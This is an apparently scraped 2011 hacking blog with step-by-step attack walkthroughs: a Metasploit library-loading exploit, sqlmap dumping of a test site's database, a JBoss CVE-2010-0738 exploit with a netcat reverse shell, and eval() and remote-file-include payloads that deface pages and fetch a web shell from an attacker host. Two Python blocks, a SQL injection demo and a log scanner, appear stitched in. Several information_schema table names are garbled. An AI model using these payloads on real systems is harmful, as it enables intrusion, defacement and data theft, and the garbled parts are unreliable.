msf> set BASENAME reports<br />
msf> set extensions grp <br />
msf> set LHOST 192.168.1.69<br />
msf> set SRVHOST 192.168.1.69<br />
msf> set LPORT 8888<br />
msf> set SRVPORT 80<br />
msf> set SHARENAME documents<br />
msf> exploit<br />
Now, go to the client, browse the directory file://192.168.1.69/ and click on any file.<br />
Done, you have your shell<br />
msf> sessions<br />
<br />
Now, go to this website to see the list of all applications that are vulnerable:<br />
<a href="http://vupen.com/english/searchengine.php?keyword=insecure+library+loading">http://vupen.com/english/searchengine.php?keyword=insecure+library+loading</a><br />
How to do sql injections with SQLMAP (posted 2011-03-12)<br />
Hi everyone, today I will explain how to use a tool called sqlmap. This tool makes your life easier: no more guessing the right URL with weird and complex combinations to get the information you need from the server. Acunetix made a website available for SQL injection tests: http://testphp.vulnweb.com/<br />
<br />
So, I know there is a problem in this URL http://testphp.vulnweb.com/listproducts.php?cat=1, because if you request http://testphp.vulnweb.com/listproducts.php?cat=' you get a MySQL error:<br />
<br />
<b>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br />
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/default/htdocs/listproducts.php on line 74</b><br />
<br />
Now, if you want to know how many fields this table has, you have to request these one after another:<br />
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1-- <br />
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 2-- <br />
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 3-- <br />
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 4-- <br />
and so on until you get another error; in this case it is 11, so you know there are 11 fields in this table, because order by 12 gives an error.<br />
Ok, now if I want to know the user this database is running as, I would type:<br />
<a href="http://testphp.vulnweb.com/listproducts.php?cat=1">http://testphp.vulnweb.com/listproducts.php?cat=1</a> UNION SELECT ALL 1,USER(),3,4,5,6,7,8,9,10,11--<br />
Or the database name..<br />
<a href="http://testphp.vulnweb.com/listproducts.php?cat=1">http://testphp.vulnweb.com/listproducts.php?cat=1</a> UNION SELECT ALL 1,DATABASE(),3,4,5,6,7,8,9,10,11--<br />
Check the bottom of the page for the results.<br />
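As an added example (not from the original post), here is the order by N-- column-count probe and the UNION SELECT ALL trick above, replayed against a vulnerable query and against a hardened one on a constructed in-memory SQLite table; it uses 3 columns instead of the real 11, and sqlite_version() stands in for USER(), which SQLite does not have.<br />

```python
"""Added example (not from the original post): the 'order by N--' column
count probe and the 'UNION SELECT ALL 1,<expr>,3,...' trick replayed
against a vulnerable query and a hardened one, on an in-memory SQLite
database.  Schema and rows are constructed; the real listproducts.php
returned 11 columns, this demo uses 3 to keep it short."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the database behind listproducts.php."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE products (id INTEGER, name TEXT, cat INTEGER);"
        "INSERT INTO products VALUES (1, 'poster', 1), (2, 'print', 1), (3, 'frame', 2);"
    )
    return conn


def list_products_vulnerable(conn, cat: str):
    # The pattern behind listproducts.php?cat=...: the raw request
    # parameter is spliced into the SQL text, so it is parsed as SQL.
    sql = "SELECT id, name, cat FROM products WHERE cat=" + cat
    return conn.execute(sql).fetchall()


def list_products_safe(conn, cat: str):
    # Hardened form: validate the type first, then bind the value.  A bound
    # parameter is data, never SQL, so 'order by' / 'UNION' cannot change
    # the statement, and the type check rejects the request even earlier.
    if not cat.isdigit():
        raise ValueError("cat must be a positive integer")
    sql = "SELECT id, name, cat FROM products WHERE cat=?"
    return conn.execute(sql, (int(cat),)).fetchall()


def probe_column_count(query_fn, conn, max_cols: int = 20) -> int:
    """Replay 'cat=1 order by N--' for N = 1, 2, ... as in the post and
    return the largest N that did not error: the column count an attacker
    learns.  0 means the endpoint gave nothing away."""
    learned = 0
    for n in range(1, max_cols + 1):
        try:
            query_fn(conn, f"1 order by {n}--")
        except (sqlite3.OperationalError, ValueError):
            break
        learned = n
    return learned


def leaks_via_union(query_fn, conn, ncols: int) -> bool:
    """Replay 'cat=1 UNION SELECT ALL 1,<expr>,3,...--' from the post and
    report whether the injected expression's value came back in a row."""
    cols = ["1"] * ncols
    cols[1] = "sqlite_version()"          # the post used USER() / DATABASE()
    payload = "1 UNION SELECT ALL " + ",".join(cols) + "--"
    try:
        rows = query_fn(conn, payload)
    except (sqlite3.OperationalError, ValueError):
        return False
    return any(sqlite3.sqlite_version in str(row) for row in rows)


if __name__ == "__main__":
    db = make_db()
    for label, fn in (("vulnerable", list_products_vulnerable),
                      ("safe", list_products_safe)):
        print(f"{label}: columns learned = {probe_column_count(fn, db)}, "
              f"UNION leaks = {leaks_via_union(fn, db, 3)}")
```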
<br />
<br />
Pretty boring and time consuming, eh? Let's make this easier with sqlmap.<br />
You can download sqlmap or use the one that ships with BackTrack: root@bt:/pentest/database/sqlmap/<br />
Open sqlmap.conf and put the vulnerable URL in the url field; it should look like this:<br />
url = http://testphp.vulnweb.com/listproducts.php?cat=1<br />
Save it and now let's run some tests.<br />
<br />
1) sqlmap -h (look at all the different things you can do)<br />
2) Let's open a SQL shell on the remote server with this command: ./sqlmap.py -c sqlmap.conf --sql-shell<br />
Now you are in a shell and can type any SQL query; here are some examples from my SQL shell:<br />
<br />
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)<br />
web application technology: Apache 2.0.55, PHP 5.1.2<br />
back-end DBMS: MySQL 5<br />
[21:28:02] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER<br />
sql-shell> version()<br />
do you want to retrieve the SQL statement output? [Y/n] y<br />
[21:28:55] [INFO] fetching SQL query output: 'version()'<br />
[21:28:55] [INFO] retrieved: 5.0.22-Debian_0ubuntu6.06.6-log<br />
version(): '5.0.22-Debian_0ubuntu6.06.6-log'<br />
<br />
sql-shell> user()<br />
do you want to retrieve the SQL statement output? [Y/n] y<br />
[21:29:39] [INFO] fetching SQL query output: 'user()'<br />
[21:29:39] [INFO] retrieved: acuart@localhost<br />
user(): 'acuart@localhost'<br />
<br />
################<br />
Now let's list all databases and tables with the command: ./sqlmap.py -c sqlmap.conf --tables<br />
And this is the result:<br />
Database: acuart<br />
[7 tables]<br />
+---------------------------------------+<br />
| aaars |<br />
| aaastbes |<br />
| aaastbook |<br />
| aaatured |<br />
| aarts |<br />
| aateg |<br />
| artists |<br />
+---------------------------------------+<br />
<br />
Database: modrewriteShop<br />
[1 table]<br />
+---------------------------------------+<br />
| products |<br />
+---------------------------------------+<br />
<br />
Database: information_schema<br />
[16 tables]<br />
+---------------------------------------+<br />
| CABGG |<br />
| CABGGERIVILEGES |<br />
| CABGGERS |<br />
| CABLES |<br />
| CABLE_CONSTRAINTS |<br />
| CABLE_PRIVILEGES |<br />
| CCATISTICS |<br />
| CCHEMATA |<br />
| CCHEMA_PRIVILEGES |<br />
| CEUTINES |<br />
| CEY_COLUMN_USAGE |<br />
| CHARACTER_SETS |<br />
| COLLATIONS |<br />
| COLLATION_CHARACTER_SET_APPLICABILITY |<br />
| COLUMNS |<br />
| COLUMN_PRIVILEGES |<br />
+---------------------------------------+<br />
<br />
<br />
Pretty easy, don't you think? Well, this is just an introduction to what you can do with sqlmap, have fun!!<br />
Proof of concept on jboss exploit (CVE-2010-0738) (posted 2011-03-12)<br />
<iframe allowfullscreen="" frameborder="0" height="510" src="http://www.youtube.com/embed/pErDcezjaLo" title="YouTube video player" width="640"></iframe><br />
<br />
CVE: CVE-2010-0738<br />
Remote: Yes<br />
Local: No<br />
URL about the vulnerability and download of the exploit: <a href="http://www.securityfocus.com/bid/39710/info">http://www.securityfocus.com/bid/39710/info</a><br />
<br />
<br />
JBoss Enterprise Application Platform is prone to multiple vulnerabilities, including an information-disclosure issue and multiple authentication-bypass issues. An attacker can exploit these issues to bypass certain security restrictions to obtain sensitive information or gain unauthorized access to the application.<br />
Ok, now let's rock and roll!<br />
1) Open two shells on your BackTrack or pentest machine.<br />
2) In the first one, prepare your pentest server to receive the connection back from the target machine by typing: nc -l -p 8000 -vvv<br />
3) Now, in the other shell, run the exploit: perl jboss.pl mytargettest.com 8080 172.16.1.79 8000 lnx<br />
<br />
If you see this in the exploit shell, it means it worked!<br />
<br />
UPLOAD... SUCCESS<br />
EXECUTE<br />
SUCCESS<br />
<br />
<div>
<br />
Now go to your other shell and you should have your reverse shell connected!</div>
<div>
<br /></div>
<div>
Have fun.</div>
<div>
<br /></div><br />
Deface using EVAL() function (posted 2011-03-05)<br />
<iframe allowfullscreen="" frameborder="0" height="390" src="http://www.youtube.com/embed/RLif-Nl05fQ" title="YouTube video player" width="480"></iframe><br />
<br />
"Eval () is a PHP function that allows to interpret a given string as PHP code, because eval () is often used in Web applications,although interpretation of the chain is widely liked manipulated, eval () serves most of the time to execute php code containing previously defined variable.<br />
The problem is that if eval () executes a variable that you can modify the code contained by php eval () will execute as such. Reminder: eval () allows execution of a given string as PHP code but not write (or if so desired) its content in this page or others, he is content to perform, and display the result."<br />
<br />
Ok, this is our vulnerable page:<br />
<br />
<?php<br />
$Ev = $_GET['ev'];<br />
$eva = stripslashes($Ev);<br />
eval($eva);<br />
?><br />
Now let's go to the interesting part. To start, we need to test whether the page is vulnerable by requesting this:<br />
<a href="http://mytargettest.com/hacktest/index.php?ev=phpinfo">http://mytargettest.com/hacktest/index.php?ev=phpinfo</a>();<br />
If you can see the phpinfo page, it means we can exploit it.<br />
Now let's see what we can do.<br />
1) You can just deface the index.php using this URL -> <a href="http://mytargettest.com/hacktest/index.php?ev=$z=fopen%28%22index.php%22,%27w%27%29;fwrite%28$z,%28%22Defaced">http://mytargettest.com/hacktest/index.php?ev=$z=fopen("index.php",'w');fwrite($z,("Defaced</a> by Hacker"));fclose($z);<br />
<br />
2) Or you can create your shell with this URL -> <a href="http://mytargettest.com/hacktest/index.php?ev=$z=fopen%28%22shell.php%22,%27w%27%29;fwrite%28$z,file_get_contents%28%22http://172.16.1.79/exploits/back.txt%22%29%29;fclose%28$z">http://mytargettest.com/hacktest/index.php?ev=$z=fopen("shell.php",'w');fwrite($z,file_get_contents("http://172.16.1.79/exploits/back.txt"));fclose($z</a>);<br />
<br />
3) Browse your shell : <a href="http://mytargetest.com/hacktest/shell.php">http://mytargetest.com/hacktest/shell.php</a><br />
Now just look at my old posts (LFI or RFI) and you will know what to do from this point ;)<br />
How to exploit RFI (Remote File Include) vulnerability on webpages (posted 2011-03-05)<br />
<iframe allowfullscreen="" frameborder="0" height="390" src="http://www.youtube.com/embed/bCy_5smSRys" title="YouTube video player" width="480"></iframe><br />
<br />
Hi everyone, this post is really similar to the one I just made (LFI); the only difference is that you can include your own code into the remote server more easily.<br />
So, this is our vulnerable webpage:<br />
http://mytargettest.com/hacktest/rfi.php?COLOR=color.css<br />
BUT instead of loading the file color.css, we will be loading our own code onto that box, like this:<br />
<br />
http://mytargettest.com/hacktest/rfi.php?COLOR=http://172.16.1.79/exploits/evil3.txt<br />
<br />
The content of evil3.txt is :<br />
<br />
<?php $z=fopen('./shell.php','w');fwrite($z,file_get_contents('http://172.16.1.79/exploits/back.txt'));fclose($z); ?><br />
<br />
Notice that the extension of the file is .txt; there is a reason for that: if you use .php, the code will be interpreted by the pentest server instead of the target server, so don't forget to use .txt for your evil code.<br />
Great, we just uploaded our shell to the server; now browse to it: http://mytargettest.com/hacktest/shell.php<br />
Now you can just repeat what I did in the LFI post to get your real shell on the server.<br />
<br />
Another tip: some developers append an extension such as .css or .php to the included filename. So how do we get around that? You just add a null byte at the end of the URL.<br />
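As an added example (not from the original posts), here is a small access-log scanner that flags the request shapes used in the phpMyAdmin eval, eval(), RFI and SQL injection posts above, so a defender can recognise them in web server logs; the log lines and client IPs are constructed, while the URL patterns are the ones the posts show.<br />

```python
"""Added example (not from the original posts): an access-log scanner for
the request shapes used in the posts above.  SAMPLE_LOG is constructed
(hypothetical client IPs); the URL patterns are the ones the posts show:
config.inc.php?eval=..., index.php?ev=..., rfi.php?COLOR=http://...,
a trailing %00, and 'order by N--' / 'UNION SELECT ALL ...'."""
import re
from urllib.parse import unquote

SAMPLE_LOG = """\
10.0.0.5 - - [05/Aug/2011:10:01:02 +0100] "GET /phpmyadmin/config/config.inc.php?eval=system(%22cat%20/etc/passwd%22); HTTP/1.1" 200 812
10.0.0.5 - - [05/Aug/2011:10:01:09 +0100] "GET /hacktest/index.php?ev=$z=fopen(%22shell.php%22,%27w%27);fclose($z); HTTP/1.1" 200 44
10.0.0.5 - - [05/Aug/2011:10:01:15 +0100] "GET /hacktest/rfi.php?COLOR=http://172.16.1.79/exploits/evil3.txt HTTP/1.1" 200 120
10.0.0.5 - - [05/Aug/2011:10:01:20 +0100] "GET /hacktest/rfi.php?COLOR=../../../../etc/passwd%00 HTTP/1.1" 200 1800
10.0.0.5 - - [05/Aug/2011:10:01:33 +0100] "GET /listproducts.php?cat=1%20UNION%20SELECT%20ALL%201,USER(),3,4,5,6,7,8,9,10,11-- HTTP/1.1" 200 5100
10.0.0.9 - - [05/Aug/2011:10:02:00 +0100] "GET /hacktest/rfi.php?COLOR=color.css HTTP/1.1" 200 300
10.0.0.9 - - [05/Aug/2011:10:02:05 +0100] "GET /listproducts.php?cat=2 HTTP/1.1" 200 4800
"""

# Combined-format prefix: client identd user [time] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

PHP_CALL_RE = re.compile(r"\w+\s*\(")                    # system(...), fopen(...), phpinfo()
REMOTE_URL_RE = re.compile(r"^(https?|ftp)://", re.I)     # include parameter pointing off-host
SQL_PROBE_RE = re.compile(r"\border\s+by\s+\d+|\bunion\s+(all\s+)?select\b", re.I)


def parse_query(query: str):
    """Yield decoded (key, value) pairs; split only on '&' so the ';' that
    PHP payloads contain stays inside the value."""
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            yield unquote(key), unquote(value)


def classify_param(key: str, value: str) -> list:
    """Return the names of every rule the parameter trips (empty if clean)."""
    hits = []
    if key.lower() in ("eval", "ev") and PHP_CALL_RE.search(value):
        hits.append("php-code-in-eval-param")    # config.inc.php?eval=, index.php?ev=
    if REMOTE_URL_RE.match(value):
        hits.append("remote-file-include")        # rfi.php?COLOR=http://.../evil3.txt
    if "\x00" in value:
        hits.append("null-byte-truncation")       # %00 used to drop an appended .css/.php
    if SQL_PROBE_RE.search(value):
        hits.append("sql-injection-probe")        # order by N-- / UNION SELECT ALL 1,USER(),...
    return hits


def scan_log(text: str) -> list:
    """Return (line_number, client_ip, hits) for every request that trips a rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue                               # not an access-log line; skip it
        query = m.group("target").partition("?")[2]
        hits = []
        for key, value in parse_query(query):
            hits.extend(classify_param(key, value))
        if hits:
            findings.append((lineno, m.group("ip"), hits))
    return findings


if __name__ == "__main__":
    for lineno, ip, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {ip} -> {', '.join(hits)}")
```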